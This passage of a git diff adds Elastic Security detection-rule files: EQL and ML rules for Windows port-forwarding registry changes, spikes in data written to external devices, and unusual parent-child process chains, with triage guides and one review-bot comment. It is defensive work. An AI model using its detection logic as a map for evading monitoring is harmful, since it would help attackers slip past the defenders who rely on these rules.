Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a macOS System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, for MacOS it is recommended to select \"Traditional Endpoints\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". 
If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/current/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: macOS", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Tactic: Execution", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1548", + "name": "Abuse Elevation Control Mechanism", + "reference": "https://attack.mitre.org/techniques/T1548/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 106 + }, + "id": "35330ba2-c859-4c98-8b7f-c19159ea0e58_106", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/3535c8bb-3bd5-40f4-ae32-b7cd589d5372_109.json b/packages/security_detection_engine/kibana/security_rule/3535c8bb-3bd5-40f4-ae32-b7cd589d5372_109.json new file mode 100644 index 00000000000..29ab1f01a2c --- /dev/null 
+++ b/packages/security_detection_engine/kibana/security_rule/3535c8bb-3bd5-40f4-ae32-b7cd589d5372_109.json 
@@ -0,0 +1,97 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the creation of a new port forwarding rule. An adversary may abuse this technique to bypass network segmentation restrictions.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Port Forwarding Rule Addition", + "note": "## Triage and analysis\n\n### Investigating Port Forwarding Rule Addition\n\nNetwork port forwarding is a mechanism to redirect incoming TCP connections (IPv4 or IPv6) from the local TCP port to any other port number, or even to a port on a remote computer.\n\nAttackers may configure port forwarding rules to bypass network segmentation restrictions, using the host as a jump box to access previously unreachable systems.\n\nThis rule monitors the modifications to the `HKLM\\SYSTEM\\*ControlSet*\\Services\\PortProxy\\v4tov4\\` subkeys.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account and system owners and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Identify the target host IP address, check the connections originating from the host where the modification occurred, and inspect the credentials used.\n - Investigate suspicious login activity, such as unauthorized access and logins from outside working hours and unusual locations.\n\n### False positive analysis\n\n- This mechanism can be used legitimately. Analysts can dismiss the alert if the Administrator is aware of the activity and there are justifications for this configuration.\n- If this rule is noisy in your environment due to expected activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Delete the port forwarding rule.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "registry where host.os.type == \"windows\" and registry.path : (\n \"HKLM\\\\SYSTEM\\\\*ControlSet*\\\\Services\\\\PortProxy\\\\v4tov4\\\\*\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SYSTEM\\\\*ControlSet*\\\\Services\\\\PortProxy\\\\v4tov4\\\\*\"\n)\n", + "references": [ + "https://www.fireeye.com/blog/threat-research/2019/01/bypassing-network-restrictions-through-rdp-tunneling.html" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "3535c8bb-3bd5-40f4-ae32-b7cd589d5372", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: 
Windows", + "Use Case: Threat Detection", + "Tactic: Command and Control", + "Tactic: Defense Evasion", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0011", + "name": "Command and Control", + "reference": "https://attack.mitre.org/tactics/TA0011/" + }, + "technique": [ + { + "id": "T1572", + "name": "Protocol Tunneling", + "reference": "https://attack.mitre.org/techniques/T1572/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1112", + "name": "Modify Registry", + "reference": "https://attack.mitre.org/techniques/T1112/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 109 + }, + "id": "3535c8bb-3bd5-40f4-ae32-b7cd589d5372_109", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/3535c8bb-3bd5-40f4-ae32-b7cd589d5372_110.json b/packages/security_detection_engine/kibana/security_rule/3535c8bb-3bd5-40f4-ae32-b7cd589d5372_110.json new file mode 100644 index 00000000000..7ac32bd06ea --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/3535c8bb-3bd5-40f4-ae32-b7cd589d5372_110.json 
@@ -0,0 +1,97 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the creation of a new port forwarding rule. An adversary may abuse this technique to bypass network segmentation restrictions.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.registry-*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Port Forwarding Rule Addition", + "note": "## Triage and analysis\n\n### Investigating Port Forwarding Rule Addition\n\nNetwork port forwarding is a mechanism to redirect incoming TCP connections (IPv4 or IPv6) from the local TCP port to any other port number, or even to a port on a remote computer.\n\nAttackers may configure port forwarding rules to bypass network segmentation restrictions, using the host as a jump box to access previously unreachable systems.\n\nThis rule monitors the modifications to the `HKLM\\SYSTEM\\*ControlSet*\\Services\\PortProxy\\v4tov4\\` subkeys.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account and system owners and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Identify the target host IP address, check the connections originating from the host where the modification occurred, and inspect the credentials used.\n - Investigate suspicious login activity, such as unauthorized access and logins from outside working hours and unusual locations.\n\n### False positive analysis\n\n- This mechanism can be used legitimately. Analysts can dismiss the alert if the Administrator is aware of the activity and there are justifications for this configuration.\n- If this rule is noisy in your environment due to expected activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Delete the port forwarding rule.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "registry where host.os.type == \"windows\" and registry.path : (\n \"HKLM\\\\SYSTEM\\\\*ControlSet*\\\\Services\\\\PortProxy\\\\v4tov4\\\\*\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SYSTEM\\\\*ControlSet*\\\\Services\\\\PortProxy\\\\v4tov4\\\\*\"\n)\n", + "references": [ + "https://www.fireeye.com/blog/threat-research/2019/01/bypassing-network-restrictions-through-rdp-tunneling.html" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "3535c8bb-3bd5-40f4-ae32-b7cd589d5372", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: 
Windows", + "Use Case: Threat Detection", + "Tactic: Command and Control", + "Tactic: Defense Evasion", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0011", + "name": "Command and Control", + "reference": "https://attack.mitre.org/tactics/TA0011/" + }, + "technique": [ + { + "id": "T1572", + "name": "Protocol Tunneling", + "reference": "https://attack.mitre.org/techniques/T1572/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1112", + "name": "Modify Registry", + "reference": "https://attack.mitre.org/techniques/T1112/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 110 + }, + "id": "3535c8bb-3bd5-40f4-ae32-b7cd589d5372_110", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/35a3b253-eea8-46f0-abd3-68bdd47e6e3d_3.json b/packages/security_detection_engine/kibana/security_rule/35a3b253-eea8-46f0-abd3-68bdd47e6e3d_3.json new file mode 100644 index 00000000000..37386dc819a --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/35a3b253-eea8-46f0-abd3-68bdd47e6e3d_3.json 
@@ -0,0 +1,60 @@ +{ + "attributes": { + "anomaly_threshold": 75, + "author": [ + "Elastic" + ], + "description": "A machine learning job has detected high bytes of data written to an external device. In a typical operational setting, there is usually a predictable pattern or a certain range of data that is written to external devices. An unusually large amount of data being written is anomalous and can signal illicit data copying or transfer activities.", + "from": "now-2h", + "interval": "15m", + "license": "Elastic License v2", + "machine_learning_job_id": "ded_high_bytes_written_to_external_device", + "name": "Spike in Bytes Sent to an External Device", + "references": [ + "https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs.html", + "https://docs.elastic.co/en/integrations/ded", + "https://www.elastic.co/blog/detect-data-exfiltration-activity-with-kibanas-new-integration" + ], + "related_integrations": [ + { + "package": "ded", + "version": "^2.0.0" + }, + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "risk_score": 21, + "rule_id": "35a3b253-eea8-46f0-abd3-68bdd47e6e3d", + "setup": "## Setup\n\nThe rule requires the Data Exfiltration Detection integration assets to be installed, as well as network and file events collected by integrations such as Elastic Defend and Network Packet Capture (for network events only). \n\n### Data Exfiltration Detection Setup\nThe Data Exfiltration Detection integration detects data exfiltration activity by identifying abnormalities in network and file events. Anomalies are detected using Elastic's Anomaly Detection feature. 
\n\n#### Prerequisite Requirements:\n- Fleet is required for Data Exfiltration Detection.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n- File events collected by the Elastic Defend integration.\n- To install Elastic Defend, refer to the [documentation](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n#### The following steps should be executed to install assets associated with the Data Exfiltration Detection integration:\n- Go to the Kibana homepage. Under Management, click Integrations.\n- In the query bar, search for Data Exfiltration Detection and select the integration to see more details about it.\n- Under Settings, click Install Data Exfiltration Detection assets and follow the prompts to install the assets.\n\n#### Anomaly Detection Setup\nBefore you can enable rules for Data Exfiltration Detection, you'll need to enable the corresponding Anomaly Detection jobs. \n- Go to the Kibana homepage. Under Analytics, click Machine Learning.\n- Under Anomaly Detection, click Jobs, and then click \"Create job\". Select the Data View containing your file events. 
For example, this would be `logs-endpoint.events.*` if you used Elastic Defend to collect events.\n- If the selected Data View contains events that match the query in [this](https://github.com/elastic/integrations/blob/main/packages/ded/kibana/ml_module/ded-ml.json) configuration file, you will see a card for Data Exfiltration Detection under \"Use preconfigured jobs\".\n- Keep the default settings and click \"Create jobs\" to start the anomaly detection jobs and datafeeds.\n", + "severity": "low", + "tags": [ + "Use Case: Data Exfiltration Detection", + "Rule Type: ML", + "Rule Type: Machine Learning", + "Tactic: Exfiltration" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0010", + "name": "Exfiltration", + "reference": "https://attack.mitre.org/tactics/TA0010/" + }, + "technique": [ + { + "id": "T1052", + "name": "Exfiltration Over Physical Medium", + "reference": "https://attack.mitre.org/techniques/T1052/" + } + ] + } + ], + "type": "machine_learning", + "version": 3 + }, + "id": "35a3b253-eea8-46f0-abd3-68bdd47e6e3d_3", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/35df0dd8-092d-4a83-88c1-5151a804f31b_110.json b/packages/security_detection_engine/kibana/security_rule/35df0dd8-092d-4a83-88c1-5151a804f31b_110.json new file mode 100644 index 00000000000..e44cd8f7ee4 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/35df0dd8-092d-4a83-88c1-5151a804f31b_110.json 
@@ -0,0 +1,103 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies Windows programs run from unexpected parent processes. This could indicate masquerading or other strange activity on a system.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Unusual Parent-Child Relationship", + "note": "## Triage and analysis\n\n### Investigating Unusual Parent-Child Relationship\n\nWindows internal/system processes have some characteristics that can be used to spot suspicious activities. One of these characteristics is parent-child relationships. These relationships can be used to baseline the typical behavior of the system and then alert on occurrences that don't comply with the baseline.\n\nThis rule uses this information to spot suspicious parent and child processes.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, 
start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\nprocess.parent.name != null and\n (\n /* suspicious parent processes */\n (process.name:\"autochk.exe\" and not process.parent.name:\"smss.exe\") or\n (process.name:(\"fontdrvhost.exe\", \"dwm.exe\") and not process.parent.name:(\"wininit.exe\", \"winlogon.exe\")) or\n (process.name:(\"consent.exe\", \"RuntimeBroker.exe\", \"TiWorker.exe\") and not process.parent.name:\"svchost.exe\") or\n (process.name:\"SearchIndexer.exe\" and not process.parent.name:\"services.exe\") or\n (process.name:\"SearchProtocolHost.exe\" and not process.parent.name:(\"SearchIndexer.exe\", \"dllhost.exe\")) or\n (process.name:\"dllhost.exe\" and not process.parent.name:(\"services.exe\", \"svchost.exe\")) or\n (process.name:\"smss.exe\" and not process.parent.name:(\"System\", \"smss.exe\")) or\n (process.name:\"csrss.exe\" and not process.parent.name:(\"smss.exe\", \"svchost.exe\")) or\n (process.name:\"wininit.exe\" and not process.parent.name:\"smss.exe\") or\n (process.name:\"winlogon.exe\" and not process.parent.name:\"smss.exe\") or\n (process.name:(\"lsass.exe\", \"LsaIso.exe\") and not process.parent.name:\"wininit.exe\") or\n (process.name:\"LogonUI.exe\" and not process.parent.name:(\"wininit.exe\", \"winlogon.exe\")) or\n (process.name:\"services.exe\" and not process.parent.name:\"wininit.exe\") or\n (process.name:\"svchost.exe\" and not process.parent.name:(\"MsMpEng.exe\", \"services.exe\", \"svchost.exe\")) or\n (process.name:\"spoolsv.exe\" and not process.parent.name:\"services.exe\") or\n 
(process.name:\"taskhost.exe\" and not process.parent.name:(\"services.exe\", \"svchost.exe\", \"ngentask.exe\")) or\n (process.name:\"taskhostw.exe\" and not process.parent.name:(\"services.exe\", \"svchost.exe\")) or\n (process.name:\"userinit.exe\" and not process.parent.name:(\"dwm.exe\", \"winlogon.exe\")) or\n (process.name:(\"wmiprvse.exe\", \"wsmprovhost.exe\", \"winrshost.exe\") and not process.parent.name:\"svchost.exe\") or\n /* suspicious child processes */\n (process.parent.name:(\"SearchProtocolHost.exe\", \"taskhost.exe\", \"csrss.exe\") and not process.name:(\"werfault.exe\", \"wermgr.exe\", \"WerFaultSecure.exe\", \"conhost.exe\")) or\n (process.parent.name:\"autochk.exe\" and not process.name:(\"chkdsk.exe\", \"doskey.exe\", \"WerFault.exe\")) or\n (process.parent.name:\"smss.exe\" and not process.name:(\"autochk.exe\", \"smss.exe\", \"csrss.exe\", \"wininit.exe\", \"winlogon.exe\", \"setupcl.exe\", \"WerFault.exe\")) or\n (process.parent.name:\"wermgr.exe\" and not process.name:(\"WerFaultSecure.exe\", \"wermgr.exe\", \"WerFault.exe\")) or\n (process.parent.name:\"conhost.exe\" and not process.name:(\"mscorsvw.exe\", \"wermgr.exe\", \"WerFault.exe\", \"WerFaultSecure.exe\"))\n )\n", + "references": [ + "https://github.com/sbousseaden/Slides/blob/master/Hunting%20MindMaps/PNG/Windows%20Processes%20TH.map.png", + "https://www.andreafortuna.org/2017/06/15/standard-windows-processes-a-brief-reference/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + }, + { + "package": "system", + "version": "^1.6.4" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": 
"35df0dd8-092d-4a83-88c1-5151a804f31b", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1055", + "name": "Process Injection", + "reference": "https://attack.mitre.org/techniques/T1055/", + "subtechnique": [ + { + "id": "T1055.012", + "name": "Process Hollowing", + "reference": "https://attack.mitre.org/techniques/T1055/012/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 110 + }, + "id": "35df0dd8-092d-4a83-88c1-5151a804f31b_110", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/35df0dd8-092d-4a83-88c1-5151a804f31b_111.json b/packages/security_detection_engine/kibana/security_rule/35df0dd8-092d-4a83-88c1-5151a804f31b_111.json new file mode 100644 index 00000000000..7d9b9abc8ed --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/35df0dd8-092d-4a83-88c1-5151a804f31b_111.json 
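Review bot: The investigation guide in the `note` field tells the analyst to look for login events "after the registry modification", but this rule triggers on process start events with an unexpected parent and its query never touches the registry, so the sentence reads as carried over from a registry-based rule's guide. Suggest `- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the process execution.` so the triage step matches what actually alerted. The version 111 copy added further down in this diff appears to reuse the same guide text and would need the same correction. If these rule JSON files are synced from the upstream detection-rules repository, the wording fix belongs there rather than in this package.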
@@ -0,0 +1,103 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies Windows programs run from unexpected parent processes. This could indicate masquerading or other strange activity on a system.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.process-*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Unusual Parent-Child Relationship", + "note": "## Triage and analysis\n\n### Investigating Unusual Parent-Child Relationship\n\nWindows internal/system processes have some characteristics that can be used to spot suspicious activities. One of these characteristics is parent-child relationships. These relationships can be used to baseline the typical behavior of the system and then alert on occurrences that don't comply with the baseline.\n\nThis rule uses this information to spot suspicious parent and child processes.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, 
start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. 
